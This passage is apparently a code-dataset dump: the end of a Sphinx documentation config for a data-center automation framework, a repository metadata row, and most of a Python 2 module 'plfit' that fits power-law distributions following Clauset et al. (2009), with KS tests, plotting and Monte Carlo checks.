# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'CSC-DCAFdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'CSC-DCAF.tex', u'CSC DCAF Documentation',
u'Automation Team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'dcaf', u'CSC DCAF Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'DCAF', u'CSC DCAF Documentation',
author, 'CSC DCAF', 'A framework of resources designed to automate various platforms and deployments within the data center.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| [
"[email protected]"
] | |
41117c486c96cbc1a0b8327e00987380acb66a43 | 7a755ea07e20f238d171d0a00fae10c03c7fb873 | /plfit/plfit.py | fcfb89053086b20a7cab3b3807df4e1137583ec4 | [
"MIT"
] | permissive | tbowers7/plfit | 14bedc6af0d62e70b201d3047d84b99a33b744cb | 37c831d674927cfde9c7e9e85623cd7bd056b950 | refs/heads/master | 2020-05-20T19:29:30.715766 | 2014-02-05T20:20:15 | 2014-02-05T20:20:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 34,899 | py | # -*- coding: latin-1 -*-
#
# intended to implement a power-law fitting routine as specified in.....
# http://www.santafe.edu/~aaronc/powerlaws/
#
# The MLE for the power-law alpha is very easy to derive given knowledge
# of the lowest value at which a power law holds, but that point is
# difficult to derive and must be acquired iteratively.
"""
numpy/matplotlib version of plfit.py
====================================
A power-law distribution fitter based on code by Aaron Clauset. It can use
fortran, cython, or numpy-based power-law fitting 'backends'. Fortran's
fastest.
Requires pylab (matplotlib), which requires numpy
Example very simple use::
from plfit import plfit
MyPL = plfit(mydata)
MyPL.plotpdf(log=True)
"""
import numpy
import time
import pylab
try:
import fplfit
fortranOK = True
except:
fortranOK = False
try:
import cplfit
cyOK = True
except:
cyOK = False
import numpy.random as npr
from numpy import log,log10,sum,argmin,argmax,exp,min,max
try:
import scipy.stats
scipyOK = True
except ImportError:
scipyOK = False
print "scipy didn't import. Can't compute certain basic statistics."
class plfit:
"""
A Python implementation of the Matlab code `http://www.santafe.edu/~aaronc/powerlaws/plfit.m`_
from `http://www.santafe.edu/~aaronc/powerlaws/`_.
See `A. Clauset, C.R. Shalizi, and M.E.J. Newman, "Power-law distributions
in empirical data" SIAM Review, 51, 661-703 (2009). (arXiv:0706.1062)
<http://arxiv.org/abs/0706.1062>`_
The output "alpha" is defined such that :math:`p(x) \sim (x/xmin)^{-alpha}`
"""
def __init__(self,x,**kwargs):
"""
Initializes and fits the power law. Can pass "quiet" to turn off
output (except for warnings; "silent" turns off warnings)
"""
x = numpy.array(x) # make sure x is an array, otherwise the next step fails
if (x<0).sum() > 0:
print "Removed %i negative points" % ((x<0).sum())
x = x[x>0]
self.data = x
self.plfit(**kwargs)
def alpha_(self,x):
""" Create a mappable function alpha to apply to each xmin in a list of xmins.
        This is essentially the slow version of fplfit/cplfit, though I bet it could
        be sped up with a clever use of parallel_map. Not intended to be used by users.
Docstring for the generated alpha function::
Given a sorted data set and a minimum, returns power law MLE fit
data is passed as a keyword parameter so that it can be vectorized
If there is only one element, return alpha=0
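        The estimator implemented by the generated function is the continuous MLE of
        Clauset et al. (2009),
            alpha = 1 + n / sum_i ln(x_i / xmin),
        evaluated over the n points with x_i >= xmin.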
"""
def alpha(xmin,x=x):
gexmin = x>=xmin
n = gexmin.sum()
if n < 2:
return 0
x = x[gexmin]
a = 1 + float(n) / sum(log(x/xmin))
return a
return alpha
def kstest_(self,x):
"""
Create a mappable function kstest to apply to each xmin in a list of xmins.
Docstring for the generated kstest function::
Given a sorted data set and a minimum, returns power law MLE ks-test w/data
data is passed as a keyword parameter so that it can be vectorized
The returned value is the "D" parameter in the ks test.
"""
def kstest(xmin,x=x):
x = x[x>=xmin]
n = float(len(x))
if n == 0: return numpy.inf
a = float(n) / sum(log(x/xmin))
cx = numpy.arange(n,dtype='float')/float(n)
cf = 1-(xmin/x)**a
ks = max(abs(cf-cx))
return ks
return kstest
def plfit(self, nosmall=True, finite=False, quiet=False, silent=False,
usefortran=False, usecy=False, xmin=None, verbose=False,
discrete=None, discrete_approx=True, discrete_n_alpha=1000):
"""
A Python implementation of the Matlab code http://www.santafe.edu/~aaronc/powerlaws/plfit.m
from http://www.santafe.edu/~aaronc/powerlaws/
See A. Clauset, C.R. Shalizi, and M.E.J. Newman, "Power-law distributions
in empirical data" SIAM Review, 51, 661-703 (2009). (arXiv:0706.1062)
http://arxiv.org/abs/0706.1062
There are 3 implementations of xmin estimation. The fortran version is fastest, the C (cython)
version is ~10% slower, and the python version is ~3x slower than the fortran version.
Also, the cython code suffers ~2% numerical error relative to the fortran and python for unknown
reasons.
        There is also a discrete version implemented in python - it is different from the continuous version!
*discrete* [ bool | None ]
If *discrete* is None, the code will try to determine whether the
            data set is discrete or continuous based on the uniqueness of the
data; if your data set is continuous but you have any non-unique
data points (e.g., flagged "bad" data), the "automatic"
determination will fail. If *discrete* is True or False, the
            discrete or continuous fitter will be used, respectively.
*xmin* [ float / int ]
If you specify xmin, the fitter will only determine alpha assuming
the given xmin; the rest of the code (and most of the complexity)
is determining an estimate for xmin and alpha.
*nosmall* [ bool (True) ]
When on, the code rejects low s/n points. WARNING: This option,
which is on by default, may result in different answers than the
original Matlab code and the "powerlaw" python package
*finite* [ bool (False) ]
There is a 'finite-size bias' to the estimator. The "alpha" the code measures
is "alpha-hat" s.t. ᾶ = (nα-1)/(n-1), or α = (1 + ᾶ (n-1)) / n
*quiet* [ bool (False) ]
If False, delivers messages about what fitter is used and the fit results
*verbose* [ bool (False) ]
Deliver descriptive messages about the fit parameters (only if *quiet*==False)
*silent* [ bool (False) ]
If True, will print NO messages
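        Example (a sketch only; the synthetic sample below and its size are
        arbitrary, and __init__ has already called plfit() once)::
            data = numpy.random.pareto(2.5, 1000) + 1  # roughly power-law-tailed sample
            p = plfit(data, quiet=True)
            p.plfit(xmin=1.0, finite=True)             # re-fit with a fixed xmin
            print p._xmin, p._alpha, p._alphaerr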
"""
x = self.data
z = numpy.sort(x)
t = time.time()
xmins,argxmins = numpy.unique(z,return_index=True)#[:-1]
self._nunique = len(xmins)
if self._nunique == len(x) and discrete is None:
if verbose: print "Using CONTINUOUS fitter"
discrete = False
elif self._nunique < len(x) and discrete is None:
if verbose: print "Using DISCRETE fitter"
discrete = True
t = time.time()
if xmin is None:
if discrete:
self.discrete_best_alpha(approximate=discrete_approx,
n_alpha=discrete_n_alpha,
verbose=verbose,
finite=finite)
return self._xmin,self._alpha
elif usefortran and fortranOK:
dat,av = fplfit.plfit(z,int(nosmall))
goodvals=dat>0
sigma = ((av-1)/numpy.sqrt(len(z)-numpy.arange(len(z))))[argxmins]
dat = dat[goodvals]
av = av[goodvals]
if nosmall:
                # data, av already treated for this. sigma, xmins not
nmax = argmin(sigma<0.1)
xmins = xmins[:nmax]
sigma = sigma[:nmax]
if not quiet: print "FORTRAN plfit executed in %f seconds" % (time.time()-t)
elif usecy and cyOK:
dat,av = cplfit.plfit_loop(z,nosmall=nosmall,zunique=xmins,argunique=argxmins)
goodvals=dat>0
sigma = (av-1)/numpy.sqrt(len(z)-argxmins+1)
dat = dat[goodvals]
av = av[goodvals]
if not quiet: print "CYTHON plfit executed in %f seconds" % (time.time()-t)
else:
av = numpy.asarray( map(self.alpha_(z),xmins) ,dtype='float')
dat = numpy.asarray( map(self.kstest_(z),xmins),dtype='float')
sigma = (av-1)/numpy.sqrt(len(z)-argxmins+1)
if nosmall:
# test to make sure the number of data points is high enough
# to provide a reasonable s/n on the computed alpha
goodvals = sigma<0.1
nmax = argmin(goodvals)
if nmax > 0:
dat = dat[:nmax]
xmins = xmins[:nmax]
av = av[:nmax]
sigma = sigma[:nmax]
else:
if not silent:
print "Not enough data left after flagging - using all positive data."
if not quiet:
print "PYTHON plfit executed in %f seconds" % (time.time()-t)
if usefortran: print "fortran fplfit did not load"
if usecy: print "cython cplfit did not load"
self._av = av
self._xmin_kstest = dat
self._sigma = sigma
# [:-1] to weed out the very last data point; it cannot be correct
# (can't have a power law with 1 data point).
# However, this should only be done if the ends have not previously
# been excluded with nosmall
if nosmall:
xmin = xmins[argmin(dat)]
else:
xmin = xmins[argmin(dat[:-1])]
z = z[z>=xmin]
n = len(z)
alpha = 1 + n / sum(log(z/xmin))
if finite:
alpha = alpha*(n-1.)/n+1./n
if n < 50 and not finite and not silent:
print '(PLFIT) Warning: finite-size bias may be present. n=%i' % n
ks = max(abs( numpy.arange(n)/float(n) - (1-(xmin/z)**(alpha-1)) ))
# Parallels Eqn 3.5 in Clauset et al 2009, but zeta(alpha, xmin) = (alpha-1)/xmin. Really is Eqn B3 in paper.
L = n*log((alpha-1)/xmin) - alpha*sum(log(z/xmin))
#requires another map... Larr = arange(len(unique(x))) * log((av-1)/unique(x)) - av*sum
self._likelihood = L
self._xmin = xmin
self._xmins = xmins
self._alpha= alpha
self._alphaerr = (alpha-1)/numpy.sqrt(n)
self._ks = ks # this ks statistic may not have the same value as min(dat) because of unique()
if scipyOK: self._ks_prob = scipy.stats.kstwobign.sf(ks*numpy.sqrt(n))
self._ngtx = n
if n == 1:
if not silent:
print "Failure: only 1 point kept. Probably not a power-law distribution."
self._alpha = alpha = 0
self._alphaerr = 0
self._likelihood = L = 0
self._ks = 0
self._ks_prob = 0
self._xmin = xmin
return xmin,0
if numpy.isnan(L) or numpy.isnan(xmin) or numpy.isnan(alpha):
raise ValueError("plfit failed; returned a nan")
if not quiet:
if verbose: print "The lowest value included in the power-law fit, ",
print "xmin: %g" % xmin,
if verbose: print "\nThe number of values above xmin, ",
print "n(>xmin): %i" % n,
if verbose: print "\nThe derived power-law alpha (p(x)~x^-alpha) with MLE-derived error, ",
print "alpha: %g +/- %g " % (alpha,self._alphaerr),
if verbose: print "\nThe log of the Likelihood (the maximized parameter; you minimized the negative log likelihood), ",
print "Log-Likelihood: %g " % L,
if verbose: print "\nThe KS-test statistic between the best-fit power-law and the data, ",
print "ks: %g" % (ks),
if scipyOK:
if verbose: print " occurs with probability ",
print "p(ks): %g" % (self._ks_prob)
else:
print
return xmin,alpha
def discrete_best_alpha(self, alpharangemults=(0.9,1.1), n_alpha=201, approximate=True, verbose=True, finite=True):
"""
Use the maximum L to determine the most likely value of alpha
*alpharangemults* [ 2-tuple ]
Pair of values indicating multiplicative factors above and below the
approximate alpha from the MLE alpha to use when determining the
"exact" alpha (by directly maximizing the likelihood function)
*n_alpha* [ int ]
Number of alpha values to use when measuring. Larger number is more accurate.
*approximate* [ bool ]
If False, try to "zoom-in" around the MLE alpha and get the exact
best alpha value within some range around the approximate best
*vebose* [ bool ]
*finite* [ bool ]
Correction for finite data?
"""
data = self.data
self._xmins = xmins = numpy.unique(data)
if approximate:
alpha_of_xmin = [ discrete_alpha_mle(data,xmin) for xmin in xmins ]
else:
alpha_approx = [ discrete_alpha_mle(data,xmin) for xmin in xmins ]
alpharanges = [(0.9*a,1.1*a) for a in alpha_approx]
alpha_of_xmin = [ most_likely_alpha(data,xmin,alpharange=ar,n_alpha=n_alpha) for xmin,ar in zip(xmins,alpharanges) ]
ksvalues = numpy.array([ discrete_ksD(data, xmin, alpha) for xmin,alpha in zip(xmins,alpha_of_xmin) ])
self._av = numpy.array(alpha_of_xmin)
self._xmin_kstest = ksvalues
ksvalues[numpy.isnan(ksvalues)] = numpy.inf
best_index = argmin(ksvalues)
self._alpha = best_alpha = alpha_of_xmin[best_index]
self._xmin = best_xmin = xmins[best_index]
self._ks = best_ks = ksvalues[best_index]
self._likelihood = best_likelihood = discrete_likelihood(data, best_xmin, best_alpha)
        if finite:
            n = (data >= best_xmin).sum()  # number of points in the fitted tail
            self._alpha = self._alpha*(n-1.)/n+1./n
if verbose:
print "alpha = %f xmin = %f ksD = %f L = %f (n<x) = %i (n>=x) = %i" % (
best_alpha, best_xmin, best_ks, best_likelihood,
(data<best_xmin).sum(), (data>=best_xmin).sum())
self._ngtx = n = (self.data>=self._xmin).sum()
self._alphaerr = (self._alpha-1.0)/numpy.sqrt(n)
if scipyOK: self._ks_prob = scipy.stats.kstwobign.sf(self._ks*numpy.sqrt(n))
return best_alpha,best_xmin,best_ks,best_likelihood
def xminvsks(self, **kwargs):
"""
Plot xmin versus the ks value for derived alpha. This plot can be used
as a diagnostic of whether you have derived the 'best' fit: if there are
multiple local minima, your data set may be well suited to a broken
powerlaw or a different function.
"""
pylab.plot(self._xmins,self._xmin_kstest,'.')
pylab.plot(self._xmin,self._ks,'s')
#pylab.errorbar([self._ks],self._alpha,yerr=self._alphaerr,fmt='+')
ax=pylab.gca()
ax.set_ylabel("KS statistic")
ax.set_xlabel("min(x)")
pylab.draw()
return ax
def alphavsks(self,autozoom=True,**kwargs):
"""
Plot alpha versus the ks value for derived alpha. This plot can be used
as a diagnostic of whether you have derived the 'best' fit: if there are
multiple local minima, your data set may be well suited to a broken
powerlaw or a different function.
"""
pylab.plot(1+self._av,self._xmin_kstest,'.')
pylab.errorbar(self._alpha,[self._ks],xerr=self._alphaerr,fmt='+')
ax=pylab.gca()
if autozoom:
ax.set_ylim(0.8*(self._ks),3*(self._ks))
ax.set_xlim((self._alpha)-5*self._alphaerr,(self._alpha)+5*self._alphaerr)
ax.set_ylabel("KS statistic")
ax.set_xlabel(r'$\alpha$')
pylab.draw()
return ax
def plotcdf(self, x=None, xmin=None, alpha=None, pointcolor='k',
pointmarker='+', **kwargs):
"""
Plots CDF and powerlaw
"""
if x is None: x=self.data
if xmin is None: xmin=self._xmin
if alpha is None: alpha=self._alpha
x=numpy.sort(x)
n=len(x)
xcdf = numpy.arange(n,0,-1,dtype='float')/float(n)
q = x[x>=xmin]
fcdf = (q/xmin)**(1-alpha)
nc = xcdf[argmax(x>=xmin)]
fcdf_norm = nc*fcdf
D_location = argmax(xcdf[x>=xmin]-fcdf_norm)
pylab.vlines(q[D_location],xcdf[x>=xmin][D_location],fcdf_norm[D_location],color='m',linewidth=2)
#plotx = pylab.linspace(q.min(),q.max(),1000)
#ploty = (plotx/xmin)**(1-alpha) * nc
pylab.loglog(x,xcdf,marker=pointmarker,color=pointcolor,**kwargs)
#pylab.loglog(plotx,ploty,'r',**kwargs)
pylab.loglog(q,fcdf_norm,'r',**kwargs)
def plotpdf(self,x=None,xmin=None,alpha=None,nbins=50,dolog=True,dnds=False,
drawstyle='steps-post', histcolor='k', plcolor='r', **kwargs):
"""
Plots PDF and powerlaw.
kwargs is passed to pylab.hist and pylab.plot
"""
        if x is None: x=self.data
        if xmin is None: xmin=self._xmin
        if alpha is None: alpha=self._alpha
x=numpy.sort(x)
n=len(x)
pylab.gca().set_xscale('log')
pylab.gca().set_yscale('log')
if dnds:
hb = pylab.histogram(x,bins=numpy.logspace(log10(min(x)),log10(max(x)),nbins))
h = hb[0]
b = hb[1]
db = hb[1][1:]-hb[1][:-1]
h = h/db
pylab.plot(b[:-1],h,drawstyle=drawstyle,color=histcolor,**kwargs)
#alpha -= 1
elif dolog:
hb = pylab.hist(x,bins=numpy.logspace(log10(min(x)),log10(max(x)),nbins),log=True,fill=False,edgecolor=histcolor,**kwargs)
alpha -= 1
h,b=hb[0],hb[1]
else:
hb = pylab.hist(x,bins=numpy.linspace((min(x)),(max(x)),nbins),fill=False,edgecolor=histcolor,**kwargs)
h,b=hb[0],hb[1]
# plotting points are at the center of each bin
b = (b[1:]+b[:-1])/2.0
q = x[x>=xmin]
px = (alpha-1)/xmin * (q/xmin)**(-alpha)
# Normalize by the median ratio between the histogram and the power-law
# The normalization is semi-arbitrary; an average is probably just as valid
plotloc = (b>xmin)*(h>0)
norm = numpy.median( h[plotloc] / ((alpha-1)/xmin * (b[plotloc]/xmin)**(-alpha)) )
px = px*norm
plotx = pylab.linspace(q.min(),q.max(),1000)
ploty = (alpha-1)/xmin * (plotx/xmin)**(-alpha) * norm
#pylab.loglog(q,px,'r',**kwargs)
pylab.loglog(plotx,ploty,color=plcolor,**kwargs)
axlims = pylab.axis()
pylab.vlines(xmin,axlims[2],max(px),colors=plcolor,linestyle='dashed')
pylab.gca().set_xlim(min(x),max(x))
def plotppf(self,x=None,xmin=None,alpha=None,dolog=True,**kwargs):
"""
Plots the power-law-predicted value on the Y-axis against the real
values along the X-axis. Can be used as a diagnostic of the fit
quality.
"""
        if xmin is None: xmin=self._xmin
        if alpha is None: alpha=self._alpha
        if x is None: x=numpy.sort(self.data[self.data>xmin])
        else: x=numpy.sort(x[x>xmin])
# N = M^(-alpha+1)
# M = N^(1/(-alpha+1))
m0 = min(x)
N = (1.0+numpy.arange(len(x)))[::-1]
xmodel = m0 * N**(1/(1-alpha)) / max(N)**(1/(1-alpha))
if dolog:
pylab.loglog(x,xmodel,'.',**kwargs)
pylab.gca().set_xlim(min(x),max(x))
pylab.gca().set_ylim(min(x),max(x))
else:
pylab.plot(x,xmodel,'.',**kwargs)
pylab.plot([min(x),max(x)],[min(x),max(x)],'k--')
pylab.xlabel("Real Value")
pylab.ylabel("Power-Law Model Value")
def test_pl(self,niter=1e3, print_timing=False, **kwargs):
"""
Monte-Carlo test to determine whether distribution is consistent with a power law
Runs through niter iterations of a sample size identical to the input sample size.
Will randomly select values from the data < xmin. The number of values selected will
be chosen from a uniform random distribution with p(<xmin) = n(<xmin)/n.
Once the sample is created, it is fit using above methods, then the best fit is used to
compute a Kolmogorov-Smirnov statistic. The KS stat distribution is compared to the
KS value for the fit to the actual data, and p = fraction of random ks values greater
than the data ks value is computed. If p<.1, the data may be inconsistent with a
powerlaw. A data set of n(>xmin)>100 is required to distinguish a PL from an exponential,
and n(>xmin)>~300 is required to distinguish a log-normal distribution from a PL.
        For more details, see figure 4.1 and the surrounding discussion in Clauset et al. (2009).
**WARNING** This can take a very long time to run! Execution time scales as
niter * setsize
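        Example (a sketch; niter is kept small here purely to bound the runtime,
        and mydata is any positive-valued sample as in the module-level example)::
            p = plfit(mydata, quiet=True)
            pval, ks_values = p.test_pl(niter=100)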
"""
xmin = self._xmin
alpha = self._alpha
niter = int(niter)
ntail = sum(self.data >= xmin)
ntot = len(self.data)
nnot = ntot-ntail # n(<xmin)
pnot = nnot/float(ntot) # p(<xmin)
nonpldata = self.data[self.data<xmin]
nrandnot = sum( npr.rand(ntot) < pnot ) # randomly choose how many to sample from <xmin
nrandtail = ntot - nrandnot # and the rest will be sampled from the powerlaw
ksv = []
if print_timing: deltat = []
for i in xrange(niter):
# first, randomly sample from power law
# with caveat!
nonplind = numpy.floor(npr.rand(nrandnot)*nnot).astype('int')
fakenonpl = nonpldata[nonplind]
randarr = npr.rand(nrandtail)
fakepl = randarr**(1/(1-alpha)) * xmin
fakedata = numpy.concatenate([fakenonpl,fakepl])
if print_timing: t0 = time.time()
# second, fit to powerlaw
# (add some silencing kwargs optionally)
for k,v in {'quiet':True,'silent':True,'nosmall':True}.iteritems():
if k not in kwargs:
kwargs[k] = v
TEST = plfit(fakedata,**kwargs)
ksv.append(TEST._ks)
if print_timing:
deltat.append( time.time() - t0 )
print "Iteration %i: %g seconds" % (i, deltat[-1])
ksv = numpy.array(ksv)
p = (ksv>self._ks).sum() / float(niter)
self._pval = p
self._ks_rand = ksv
print "p(%i) = %0.3f" % (niter,p)
if print_timing: print "Iteration timing: %g +/- %g" % (numpy.mean(deltat),numpy.std(deltat))
return p,ksv
def lognormal(self,doprint=True):
"""
Use the maximum likelihood estimator for a lognormal distribution to
produce the best-fit lognormal parameters
"""
# N = float(self.data.shape[0])
# mu = log(self.data).sum() / N
# sigmasquared = ( ( log(self.data) - mu )**2 ).sum() / N
# self.lognormal_mu = mu
# self.lognormal_sigma = numpy.sqrt(sigmasquared)
# self.lognormal_likelihood = -N/2. * log(numpy.pi*2) - N/2. * log(sigmasquared) - 1/(2*sigmasquared) * (( self.data - mu )**2).sum()
# if doprint:
# print "Best fit lognormal is exp( -(x-%g)^2 / (2*%g^2)" % (mu,numpy.sqrt(sigmasquared))
# print "Likelihood: %g" % (self.lognormal_likelihood)
if scipyOK:
fitpars = scipy.stats.lognorm.fit(self.data)
self.lognormal_dist = scipy.stats.lognorm(*fitpars)
self.lognormal_ksD,self.lognormal_ksP = scipy.stats.kstest(self.data,self.lognormal_dist.cdf)
# nnlf = NEGATIVE log likelihood
self.lognormal_likelihood = -1*scipy.stats.lognorm.nnlf(fitpars,self.data)
# Is this the right likelihood ratio?
# Definition of L from eqn. B3 of Clauset et al 2009:
# L = log(p(x|alpha))
# _nnlf from scipy.stats.distributions:
# -sum(log(self._pdf(x, *args)),axis=0)
# Assuming the pdf and p(x|alpha) are both non-inverted, it looks
# like the _nnlf and L have opposite signs, which would explain the
# likelihood ratio I've used here:
self.power_lognorm_likelihood = (self._likelihood + self.lognormal_likelihood)
# a previous version had 2*(above). That is the correct form if you want the likelihood ratio
# statistic "D": http://en.wikipedia.org/wiki/Likelihood-ratio_test
# The above explanation makes sense, since nnlf is the *negative* log likelihood function:
## nnlf -- negative log likelihood function (to minimize)
#
# Assuming we want the ratio between the POSITIVE likelihoods, the D statistic is:
# D = -2 log( L_power / L_lognormal )
self.likelihood_ratio_D = -2 * (log(self._likelihood/self.lognormal_likelihood))
if doprint:
print "Lognormal KS D: %g p(D): %g" % (self.lognormal_ksD,self.lognormal_ksP),
print " Likelihood Ratio Statistic (powerlaw/lognormal): %g" % self.likelihood_ratio_D
print "At this point, have a look at Clauset et al 2009 Appendix C: determining sigma(likelihood_ratio)"
def plot_lognormal_pdf(self,**kwargs):
"""
Plot the fitted lognormal distribution
"""
if not hasattr(self,'lognormal_dist'):
return
normalized_pdf = self.lognormal_dist.pdf(self.data)/self.lognormal_dist.pdf(self.data).max()
minY,maxY = pylab.gca().get_ylim()
pylab.plot(self.data,normalized_pdf*maxY,'.',**kwargs)
def plot_lognormal_cdf(self,**kwargs):
"""
Plot the fitted lognormal distribution
"""
if not hasattr(self,'lognormal_dist'):
return
x=numpy.sort(self.data)
n=len(x)
xcdf = numpy.arange(n,0,-1,dtype='float')/float(n)
lcdf = self.lognormal_dist.sf(x)
D_location = argmax(xcdf-lcdf)
pylab.vlines(x[D_location],xcdf[D_location],lcdf[D_location],color='m',linewidth=2)
pylab.plot(x, lcdf,',',**kwargs)
def plfit_lsq(x,y):
"""
Returns A and B in y=Ax^B
http://mathworld.wolfram.com/LeastSquaresFittingPowerLaw.html
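    As implemented below, the fit is ordinary least squares in log space:
        B = [ n*sum(ln(x)*ln(y)) - sum(ln(x))*sum(ln(y)) ] / [ n*sum(ln(x)**2) - (sum(ln(x)))**2 ]
        A = exp( [ sum(ln(y)) - B*sum(ln(x)) ] / n )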
"""
n = len(x)
btop = n * (log(x)*log(y)).sum() - (log(x)).sum()*(log(y)).sum()
bbottom = n*(log(x)**2).sum() - (log(x).sum())**2
b = btop / bbottom
a = ( log(y).sum() - b * log(x).sum() ) / n
A = exp(a)
return A,b
def plexp(x,xm=1,a=2.5):
"""
CDF(x) for the piecewise distribution exponential x<xmin, powerlaw x>=xmin
This is the CDF version of the distributions drawn in fig 3.4a of Clauset et al.
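    In the form used below (C is the normalising constant computed in the code),
        CDF(x) = C*(xm/a)*exp(a) - C*(xm/a)*exp(-a*(x/xm - 1))    for x <  xm
        CDF(x) = 1 + C*(xm/(1-a))*(x/xm)**(1-a)                   for x >= xm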
"""
C = 1/(-xm/(1 - a) - xm/a + exp(a)*xm/a)
Ppl = lambda(X): 1+C*(xm/(1-a)*(X/xm)**(1-a))
Pexp = lambda(X): C*xm/a*exp(a)-C*(xm/a)*exp(-a*(X/xm-1))
d=Ppl(x)
d[x<xm]=Pexp(x)
return d
def plexp_inv(P,xm,a):
"""
Inverse CDF for a piecewise PDF as defined in eqn. 3.10
of Clauset et al.
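    A typical use (a sketch mirroring test_fitter below; npts is arbitrary) is to
    draw synthetic samples by feeding in uniform random numbers:
        samples = plexp_inv(numpy.random.rand(npts), xm, a)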
"""
C = 1/(-xm/(1 - a) - xm/a + exp(a)*xm/a)
Pxm = 1+C*(xm/(1-a))
x = P*0
x[P>=Pxm] = xm*( (P[P>=Pxm]-1) * (1-a)/(C*xm) )**(1/(1-a)) # powerlaw
x[P<Pxm] = (log( (C*xm/a*exp(a)-P[P<Pxm])/(C*xm/a) ) - a) * (-xm/a) # exp
return x
def pl_inv(P,xm,a):
"""
Inverse CDF for a pure power-law
"""
x = (1-P)**(1/(1-a)) * xm
return x
def test_fitter(xmin=1.0,alpha=2.5,niter=500,npts=1000,invcdf=plexp_inv):
"""
Tests the power-law fitter
Examples
========
Example (fig 3.4b in Clauset et al.)::
xminin=[0.25,0.5,0.75,1,1.5,2,5,10,50,100]
xmarr,af,ksv,nxarr = plfit.test_fitter(xmin=xminin,niter=1,npts=50000)
loglog(xminin,xmarr.squeeze(),'x')
Example 2::
xminin=[0.25,0.5,0.75,1,1.5,2,5,10,50,100]
xmarr,af,ksv,nxarr = plfit.test_fitter(xmin=xminin,niter=10,npts=1000)
loglog(xminin,xmarr.mean(axis=0),'x')
Example 3::
xmarr,af,ksv,nxarr = plfit.test_fitter(xmin=1.0,niter=1000,npts=1000)
hist(xmarr.squeeze());
# Test results:
# mean(xmarr) = 0.70, median(xmarr)=0.65 std(xmarr)=0.20
# mean(af) = 2.51 median(af) = 2.49 std(af)=0.14
# biased distribution; far from correct value of xmin but close to correct alpha
Example 4::
xmarr,af,ksv,nxarr = plfit.test_fitter(xmin=1.0,niter=1000,npts=1000,invcdf=pl_inv)
print("mean(xmarr): %0.2f median(xmarr): %0.2f std(xmarr): %0.2f" % (mean(xmarr),median(xmarr),std(xmarr)))
print("mean(af): %0.2f median(af): %0.2f std(af): %0.2f" % (mean(af),median(af),std(af)))
# mean(xmarr): 1.19 median(xmarr): 1.03 std(xmarr): 0.35
# mean(af): 2.51 median(af): 2.50 std(af): 0.07
"""
xmin = numpy.array(xmin)
if xmin.shape == ():
xmin.shape = 1
lx = len(xmin)
sz = [niter,lx]
xmarr,alphaf_v,ksv,nxarr = numpy.zeros(sz),numpy.zeros(sz),numpy.zeros(sz),numpy.zeros(sz)
for j in xrange(lx):
for i in xrange(niter):
randarr = npr.rand(npts)
fakedata = invcdf(randarr,xmin[j],alpha)
TEST = plfit(fakedata,quiet=True,silent=True,nosmall=True)
alphaf_v[i,j] = TEST._alpha
ksv[i,j] = TEST._ks
nxarr[i,j] = TEST._ngtx
xmarr[i,j] = TEST._xmin
return xmarr,alphaf_v,ksv,nxarr
def discrete_likelihood(data, xmin, alpha):
"""
Equation B.8 in Clauset
Given a data set, an xmin value, and an alpha "scaling parameter", computes
the log-likelihood (the value to be maximized)
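    Concretely, as implemented below,
        L(alpha) = -n*ln(zeta(alpha, xmin)) - alpha * sum_i ln(x_i)
    where the count n and the sum run over the data points with x_i >= xmin and
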